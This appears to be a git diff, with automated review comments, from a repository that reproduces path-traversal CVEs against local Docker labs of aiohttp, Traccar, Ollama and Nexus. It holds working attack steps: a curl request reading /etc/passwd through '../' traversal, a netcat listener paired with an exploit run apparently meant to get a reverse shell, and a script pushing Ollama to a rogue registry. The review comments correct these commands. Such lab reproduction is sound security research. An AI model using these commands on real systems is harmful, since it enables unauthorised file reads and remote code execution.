5 changes: 5 additions & 0 deletions .gitignore
Expand Up @@ -2,4 +2,9 @@
go1.21.1.linux-amd64.tar.gz
go.sum
go.mod
success.txt

path_traversal/CVE-2024-48914/package-lock.json
path_traversal/CVE-2023-1177/.env
path_traversal/CVE-2024-48914/package.json
.gitignore
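Review bot: ignoring `path_traversal/CVE-2024-48914/package.json` and `package-lock.json` drops the only record of which Node dependency versions the CVE-2024-48914 setup was built against; keep both files tracked (the lockfile is what makes the vulnerable dependency set reproducible for the next person) and put only generated artifacts in this list. Ignoring `path_traversal/CVE-2023-1177/.env` is the right call for credentials. The final `.gitignore` entry is a no-op: git keeps tracking a file that is already committed regardless of ignore rules, so ignoring the ignore file itself does nothing and should be removed.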
2 changes: 1 addition & 1 deletion path_traversal/CVE-2024-23334/readme.md
Expand Up @@ -14,6 +14,6 @@
- Execute : ``` python CVE-2024-23334.py ```

### Step 2:
- Target Server: ``` http://localhost/8081```
- Target Server: ``` http://localhost:8081```
- Once aiohttp server is up and running, check on port 8081 of localhost
- ``` curl -s --path-as-is "http://localhost:8081/static/../../../../../etc/passwd ```
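Review bot: the host/port fix on the Target Server line is correct, but the `curl` line directly below it is still broken: the URL is missing its closing double quote before the fence, so pasting it as written leaves the shell waiting for more input. It should read ``` curl -s --path-as-is "http://localhost:8081/static/../../../../../etc/passwd" ```. Keep `--path-as-is`; without it curl collapses the `../` segments client-side and the traversal never reaches the aiohttp static handler.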
Empty file modified path_traversal/CVE-2024-24809/exec.sh
100644 → 100755
Empty file.
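Review bot: the mode change to 100755 matches the `./exec.sh &` invocation in the CVE-2024-24809 readme, but that readme still carries a `chmod +x exec.sh` step and tells the reader to copy the file's contents into the container by hand, where the repository mode does not carry over. Either drop the chmod from the readme or keep it with a note that it is only needed when the script is recreated inside the container.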
30 changes: 27 additions & 3 deletions path_traversal/CVE-2024-24809/readme.md
Expand Up @@ -23,10 +23,34 @@ nc -lvnp 4444
```

### Step 3:
- Target server: ``` http://localhost/8089```

- ```sudo docker ps -a``` and find your container id. ```sudo dokcer inspect <containerID>```
- Getting the bash shel inside the container traccar application: ```sudo docker exec -it de754882c324 sh```
- Execute the following commands:
```
apk add dcron
apk add openrc
apk add nano
apk add inotify-tools
Update /etc/crontabs/root to have the 1minute job: nano /etc/crontabs/root
- inside the file add the following at the end:= * * * * * run-parts /etc/periodic/1minute
mkdir /etc/periodic/1minute
rc-service /usr/sbin/crond start
crontab -l

Copy contents from the exec.sh file


chmod +x exec.sh

Run this file in the below terminal:
/opt/traccar # ./exec.sh &
```
- Check your host port and add it in the ```target_url=``` inside the exec.sh, bash file
- Target server: ``` http://localhost:8089```

Execute exploit script

```
go run exploit.go http://localhost:80 LISTENER_IP LISTENER_PORT
```
go run exploit.go http://localhost:80 < LISTENER_IP > < LISTENER_PORT >
```
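Review bot: the new invocation `go run exploit.go http://localhost:80 < LISTENER_IP > < LISTENER_PORT >` does not work as typed: with spaces around them the shell treats `<` and `>` as redirections, so `< LISTENER_IP` tries to open a file named LISTENER_IP for stdin and neither argument reaches exploit.go. Write the placeholders without spaces, `<LISTENER_IP> <LISTENER_PORT>`, or better, show concrete values that match the `nc -lvnp 4444` listener above. The target URL is also inconsistent: the exploit is run against `http://localhost:80` while the Target server line in Step 3 now says `http://localhost:8089`; pick one and use it in both places. Smaller issues in the same hunk: `sudo dokcer inspect` and `bash shel` are typos; `docker exec -it de754882c324 sh` hard-codes one machine's container ID right after the text introduced `<containerID>`; the two lines `Update /etc/crontabs/root to have the 1minute job: nano /etc/crontabs/root` and `- inside the file add the following at the end:= * * * * * run-parts /etc/periodic/1minute` are prose sitting inside the shell fence and will fail if pasted, so replace them with `echo '* * * * * run-parts /etc/periodic/1minute' >> /etc/crontabs/root` and move `mkdir /etc/periodic/1minute` above it; and `rc-service /usr/sbin/crond start` passes a path where rc-service expects a service name (`rc-service crond start`), and inside a container without an openrc init simply running `crond` is the more reliable choice.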
4 changes: 2 additions & 2 deletions path_traversal/CVE-2024-37032/exec.sh
@@ -1,6 +1,6 @@
#!/bin/bash

HOST="10.155.102.94"
HOST="192.168.1.40"
target_url="http://${HOST}:11434"

vuln_registry_url="${HOST}/rogue/poc"
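Review bot: `HOST="192.168.1.40"` swaps one hard-coded LAN address for another, so the next user has to edit the script again and keep it in sync with the `HOST` in target_server.py by hand. Take it from the command line or the environment instead, e.g. `HOST="${1:?usage: $0 <host>}"` or `HOST="${HOST:-192.168.1.40}"`. Worth a comment in the script as well: `HOST` serves both as the Ollama target (`${target_url}` on port 11434) and as the host part of `vuln_registry_url`, so the rogue registry has to be reachable on that same address.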
Expand All @@ -9,4 +9,4 @@ pull_url="${target_url}/api/pull"
push_url="${target_url}/api/push"

curl -X POST -H "Content-Type: application/json" -d '{"name": "'"${vuln_registry_url}"'", "insecure": true}' "${pull_url}"
curl -X POST -H "Content-Type: application/json" -d '{"name": "'"${vuln_registry_url}"'", "insecure": true}' "${push_url}"
curl -X POST -H "Content-Type: application/json" -d '{"name": "'"${vuln_registry_url}"'", "insecure": true}' "${push_url}"
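Review bot: the push line is identical before and after, so this part of the hunk is a whitespace or line-ending change only; if a trailing newline was added, say so in the commit message so reviewers do not hunt for a behavioural change. Functionally, both `curl` calls discard the HTTP status: add `-sS -f` (or check `$?`) so a 4xx/5xx from `/api/pull` does not silently fall through to `/api/push`, and add a one-line comment that `"insecure": true` is what lets Ollama talk to the plain-HTTP rogue registry named in `vuln_registry_url`.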
10 changes: 6 additions & 4 deletions path_traversal/CVE-2024-37032/readme.md
Expand Up @@ -21,10 +21,12 @@ Execute the following to install go
Execute: ``` docker run -d -v ollama:/root/.ollama -p 11434:11434 --name ollama ollama/ollama:0.1.33 ```
and set up the docker container

## Step 2:
- Target server: ```http://localhost/80```
## Step 2:
- ```hostname -I``` to find your IP. Add this inside target_server.py : ```HOST = ```

- Target server: ```http://localhost/```
- Rogue Server Setup:
Execute Target Server: ``` go run rogue_server.go ```
Execute Target Server: ``` python target_server.py ```

## Step 3:
Exploit Script Execution: ``` go run CVE-2024-23334.go ```
Exploit Script Execution: ``` ./exec.sh ```
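Review bot: the step `hostname -I to find your IP. Add this inside target_server.py : HOST =` is incomplete: exec.sh in this same change has its own `HOST="192.168.1.40"` line, so the reader has to update both files or the `/api/pull` request points at a registry that is not listening. Either document both edits or have the scripts read one shared value. The labels are also confusing: `Execute Target Server: python target_server.py` sits under `Rogue Server Setup`, while the actual target is the Ollama container from Step 1 on port 11434, and `Target server: http://localhost/` gives no port at all; call target_server.py the rogue registry and state the port it listens on. Finally, `hostname -I` can print several addresses; say which one to use (the one the Ollama container can reach).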
2 changes: 1 addition & 1 deletion path_traversal/CVE-2024-37032/target_server.py
@@ -1,6 +1,6 @@
from fastapi import FastAPI, Request, Response

HOST = "10.155.102.94"
HOST = "192.168.1.40"
app = FastAPI()

@app.get("/")
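Review bot: same hard-coded address problem as in exec.sh: `HOST = "192.168.1.40"` has to match the value in exec.sh by hand. Read it once from the environment, `HOST = os.environ.get("HOST", "192.168.1.40")`, and have the readme export it, so one value drives both the rogue registry and the pull request.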
2 changes: 1 addition & 1 deletion path_traversal/CVE-2024-48914/readme.md
Expand Up @@ -64,7 +64,7 @@ volumes:
driver: local
```
- Build the docker and run it:
```docker compose up --build```
```sudo docker-compose up```

### Step 3:
- Open a new terminal and run the following commands
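Review bot: replacing `docker compose up --build` with `sudo docker-compose up` loses `--build`, so a stale image from an earlier run is reused and edits to the Dockerfile or service sources are silently ignored; keep `--build`. `docker-compose` (hyphenated) is the legacy standalone v1 binary and `docker compose` is the current plugin, so unless the lab environment specifically lacks the plugin the original form is the better one. `sudo` is only needed when the user is not in the docker group, so it is better mentioned once as a note than baked into the command.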
4 changes: 3 additions & 1 deletion path_traversal/CVE-2024-4956/readme.md
@@ -1,3 +1,5 @@
# CVE-2024-4956: Path Traversal Vulnerability in Sonatype Nexus Repository 3

## Article Source :
```
https://ethicalhacking.uk/cve-2024-4956-path-traversal-vulnerability-in-sonatype-nexus-repository-3/#gsc.tab=0
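Review bot: the added title is good; while touching the source block, drop the `#gsc.tab=0` fragment from the article URL, which is Google Custom Search state and not part of the page address.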
Expand All @@ -15,5 +17,5 @@ docker run -p 8081:8081 --name nexus sonatype/nexus3:3.68.0-java8
### Step 3:
Create ```exploit.sh bash``` file
### Step 4: Execute:
- Target Server: ``` http://localhost/8081 ```
- Target Server: ``` http://localhost:8081 ```
``` ./exploit.sh ```
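Review bot: the port separator fix is correct, but `Create exploit.sh bash file` in the context above still gives no content for the script, so Step 3 cannot be followed as written; either commit exploit.sh alongside the readme or inline the request it sends.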